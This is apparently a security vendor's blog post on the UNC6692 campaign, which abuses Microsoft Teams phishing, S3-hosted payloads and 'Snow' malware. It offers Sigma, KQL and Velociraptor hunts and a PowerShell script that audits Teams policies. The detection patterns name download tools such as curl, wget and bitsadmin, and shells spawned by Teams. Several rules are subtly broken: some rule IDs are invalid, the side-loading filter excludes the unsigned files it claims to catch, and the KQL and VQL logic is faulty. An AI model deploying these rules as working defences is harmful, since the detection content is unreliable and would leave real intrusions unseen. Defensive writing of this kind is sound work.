Back to Intelligence

UNC6692 Campaign: Defending Against Microsoft Teams Phishing, S3 Payloads, and Snow Malware

SA
Security Arsenal Team
April 28, 2026
7 min read

Introduction

A sophisticated threat actor tracked as UNC6692 is actively leveraging trusted collaboration channels to bypass traditional email security defenses. By weaponizing Microsoft Teams, abusing legitimate AWS S3 buckets for payload hosting, and deploying a custom malware suite known as "Snow," this group has successfully established initial access in targeted environments.

This campaign is particularly dangerous because it shifts the attack vector from the inbox—where most organizations have mature filtering—to the chat interface, where users are conditioned to trust links and files from colleagues. Defenders must immediately assume that external Teams interactions are hostile and adjust detection capabilities accordingly.

Technical Analysis

The Attack Chain

UNC6692 operates a multipronged attack chain designed to maximize social engineering success while evading network boundary defenses:

  1. Initial Access (Teams Phishing): Attackers use compromised external Microsoft 365 tenant accounts to send Teams messages to target users. These messages often masquerade as legitimate business communications, such as HR changes or shared documents, and include malicious links or file attachments.
  2. Payload Delivery (Cloud Abuse): Instead of hosting malware on their own infrastructure (which is easily blacklisted), the actors utilize AWS S3 buckets. These buckets are often legitimate or newly created with signed URLs that deliver the payload. This usage of reputable cloud domains makes network blocking extremely difficult without impacting business operations.
  3. Execution (Snow Malware): The downloaded payload is a custom malicious software suite dubbed "Snow." It typically involves DLL side-loading techniques to execute code, often disguised as legitimate installers or utilities.
  4. Command & Control (C2): The malware establishes C2 channels, often obfuscated through services like Cloudflare Workers, to blend in with normal web traffic.

Affected Platforms & Components

  • Platform: Microsoft 365 (Microsoft Teams)
  • Infrastructure: Amazon Web Services (AWS) S3
  • Malware Family: "Snow" (Custom toolkit)
  • Exploitation Status: Confirmed Active Exploitation. This is not theoretical; UNC6692 is currently engaging targets.

Defensive Gaps

This exploit highlights a critical blind spot for many SOC teams:

  • Lack of Visibility: Most SIEMs do not ingest Microsoft Teams message logs by default, meaning the initial phishing attempt is invisible.
  • Trust in Cloud Domains: Firewall and proxy rules often allow full egress to s3.amazonaws.com, providing a safe haven for payload delivery.
  • Endpoint Evasion: The "Snow" malware uses living-off-the-land (LotL) binaries and side-loading to evade simple AV signatures.

Detection & Response

The following detection rules are prioritized to catch the unique TTPs of the UNC6692 campaign, specifically focusing on anomalous Teams process behavior and suspicious interactions with cloud storage endpoints.

SIGMA Rules

YAML
---
title: Suspicious Microsoft Teams Child Process
id: 8a4b2c19-1d3e-4f5a-9b6c-7d8e9f0a1b2c
status: experimental
description: Detects Microsoft Teams spawning suspicious child processes like PowerShell or CMD. This is unusual behavior for Teams and indicates potential exploitation or command execution.
references:
  - https://attack.mitre.org/techniques/T1059/
  - https://www.darkreading.com/cloud-security/unc6692-social-engineering-malware-cloud-abuse
author: Security Arsenal
date: 2025/04/07
tags:
  - attack.execution
  - attack.t1059.003
  - attack.t1059.001
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith: '\msteams.exe'
  selection_child:
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
      - '\wscript.exe'
      - '\cscript.exe'
      - '\pwsh.exe'
  condition: selection_parent and selection_child
falsepositives:
  - Legitimate debugging by administrators (rare)
  - False positive depends on specific Teams plugins used by organization
level: high
---
title: Browser Downloading Executable from AWS S3
id: 9c5d3e20-2e4f-5g6b-0c7d-1e2f3a4b5c6d
status: experimental
description: Detects web browsers spawning processes that download executables directly from AWS S3 buckets. UNC6692 uses S3 to host payloads.
references:
  - https://attack.mitre.org/techniques/T1102/
author: Security Arsenal
date: 2025/04/07
tags:
  - attack.command_and_control
  - attack.t1102
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith:
      - '\curl.exe'
      - '\wget.exe'
      - '\bitsadmin.exe'
  selection_cli:
    CommandLine|contains:
      - 's3.amazonaws.com'
      - '.s3-'
  selection_browser_parent:
    ParentImage|contains:
      - '\chrome.exe'
      - '\msedge.exe'
      - '\firefox.exe'
  condition: (selection_img and selection_cli) or selection_browser_parent
falsepositives:
  - Legitimate developers using AWS CLI tools or scripts
level: medium
---
title: Potential DLL Side-Loading from Temp Directory
id: 0d1e2f30-3f5g-6h7i-8j9k-0l1m2n3o4p5q
status: experimental
description: Detects processes loading DLLs from the user's temporary directory. The "Snow" malware often utilizes side-loading techniques involving dropped DLLs in AppData\Temp.
references:
  - https://attack.mitre.org/techniques/T1574.001/
  - https://attack.mitre.org/techniques/T1574.002/
author: Security Arsenal
date: 2025/04/07
tags:
  - attack.defense_evasion
  - attack.t1574.001
  - attack.t1574.002
logsource:
  category: image_load
  product: windows
detection:
  selection:
    ImageLoaded|contains: '\AppData\Local\Temp\'
    ImageLoaded|endswith:
      - '.dll'
      - '.exe'
  filter:
    Signed: 'false'
  condition: selection and not filter
falsepositives:
  - Installers running from temp directories
  - Browser cache loading
level: medium

KQL (Microsoft Sentinel)

This hunt query identifies external Teams invitations and messages, which is the primary vector for UNC6692. It also correlates with potential C2 traffic to Cloudflare Workers, often used for C2 redirection in this campaign.

KQL — Microsoft Sentinel / Defender
// Hunt for External Teams interactions and suspicious S3/Cloudflare traffic
let ExternalTeamsUsers =
    OfficeActivity
    | where Operation =~ "New-IncomingTeamsMeeting" or Operation =~ "MeetingParticipantJoined"
    | where UserId contains "#EXT#" // Identifies external users
    | project TimeGenerated, UserId, Operation, ClientIP;

let SuspiciousNetworkTraffic =
    DeviceNetworkEvents
    | where Timestamp > ago(7d)
    | where RemoteUrl contains "s3.amazonaws.com" 
       or RemoteUrl contains "workers.dev"
    | summarize arg_max(Timestamp, *) by DeviceId, RemoteUrl
    | project Timestamp, DeviceName, RemoteUrl, RemotePort, InitiatingProcessFileName;

ExternalTeamsUsers
| join kind=inner SuspiciousNetworkTraffic on $left.TimeGenerated == $right.Timestamp // Time correlation
| project TimeGenerated, DeviceName, ExternalUser=UserId, MaliciousDomain=RemoteUrl, Process=InitiatingProcessFileName

Velociraptor VQL

This artifact hunts for the "Snow" malware indicators, specifically looking for recently modified files in the temp directory that match side-loading profiles (e.g., version.dll or msvcr*.dll) and checking for unusual parent-child relationships involving Teams.

VQL — Velociraptor
-- Hunt for Snow Malware Indicators
SELECT 
    OSPath.Path AS FilePath,
    Size,
    Mtime AS ModifiedTime,
    Mode.String
FROM glob(globs="/*")
WHERE 
    OSPath.Path =~ "C:\\Users\\*\\AppData\\Local\\Temp\\" 
    AND (Name =~ "\\.dll" OR Name =~ "\\.exe")
    AND ModTime < past(hours=24)

UNION

SELECT 
    Pid,
    Ppid,
    Name,
    Exe,
    CommandLine,
    Parent.Name AS ParentName
FROM pslist()
WHERE 
    (Parent.Name =~ "Teams.exe" AND Name =~ "(powershell|cmd|wscript|cscript)")
   OR (Name =~ "Teams.exe" AND CommandLine =~ "--remote-debugging")

Remediation Script (PowerShell)

This script assists in hardening the Teams environment by auditing the current external access policies. It provides commands to restrict communication with unmanaged domains, a key step in stopping UNC6692.

PowerShell
# Security Arsenal: Hardening Script for UNC6692 Vector
# Requires SkypeOnlineConnector or Microsoft Teams PowerShell Module

Write-Host "Checking Microsoft Teams External Access Policies..." -ForegroundColor Cyan

try {
    # Check if connector is available, else attempt to connect
    if (-not (Get-Module -ListAvailable -Name MicrosoftTeams)) {
        Write-Warning "MicrosoftTeams module not found. Please install it first."
        exit
    }

    # Connect to Teams (Uncomment if running interactively)
    # Connect-MicrosoftTeams

    $FederationConfig = Get-CsTenantFederationConfiguration
    Write-Host "Current Federation State:" -ForegroundColor Yellow
    Write-Host "  AllowFederatedUsers: $($FederationConfig.AllowFederatedUsers)"
    Write-Host "  RestrictFederatedUsers: $($FederationConfig.RestrictFederatedUsers)"

    $ExternalPolicy = Get-CsExternalAccessPolicy -Global
    Write-Host "Current Global Policy State:" -ForegroundColor Yellow
    Write-Host "  EnableFederationAccess: $($ExternalPolicy.EnableFederationAccess)"
    Write-Host "  EnablePublicCloudAccess: $($ExternalPolicy.EnablePublicCloudAccess)"

    Write-Host "\nREMEDIATION ADVICE:" -ForegroundColor Red
    Write-Host "To block external Teams invitations (High Security):"
    Write-Host 'Set-CsExternalAccessPolicy -Identity Global -EnableFederationAccess $false' -ForegroundColor Green
    
    Write-Host "\nTo allow only specific domains (Allow-listing approach):"
    Write-Host 'Set-CsTenantFederationConfiguration -AllowedDomains "contoso.com,fabrikam.com"' -ForegroundColor Green

} catch {
    Write-Error "An error occurred: $_"
}

Remediation

Immediate Actions

  1. Restrict Teams External Access: Modify the Global Teams External Access Policy to block federation or, at a minimum, implement an allow-list for trusted partner domains. This is the single most effective control against this specific vector.

    • Command: Set-CsExternalAccessPolicy -Identity Global -EnableFederationAccess $false

  2. Block Suspicious Cloud Domains: While blocking all of s3.amazonaws.com is rarely feasible, inspect proxy logs for downloads of executables (.exe, .msi, .dll) from S3 buckets and block specific malicious bucket identifiers. Watch for traffic to workers.dev (Cloudflare Workers) originating from non-browser processes.

  3. User Awareness: Issue a security advisory to all staff highlighting that " phishing is now happening in Teams." Instruct users to verify the sender's email address (hover over the name in Teams) and to be wary of unsolicited file transfers or meeting invites from external tenants.

Long-Term Hardening

  • Enable Safe Links for Teams: Microsoft Defender for Office 365 includes Safe Links protection for Teams. Ensure this policy is enabled and set to "On" for Teams messages.
  • Conditional Access: Implement Conditional Access policies that require device compliance (Hybrid Azure AD Join) before external Teams users can interact with internal users, effectively blocking anonymous or unmanaged external accounts.
  • Audit AWS S3: Ensure your own organization's S3 buckets are not public, preventing abuse by this or other actors for payload hosting.

Related Resources

Security Arsenal Managed SOC Services AlertMonitor Platform Book a SOC Assessment soc-mdr Intel Hub

mdrthreat-huntingendpoint-detectionsecurity-monitoringunc6692microsoft-teamscloud-securitysnow-malware

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action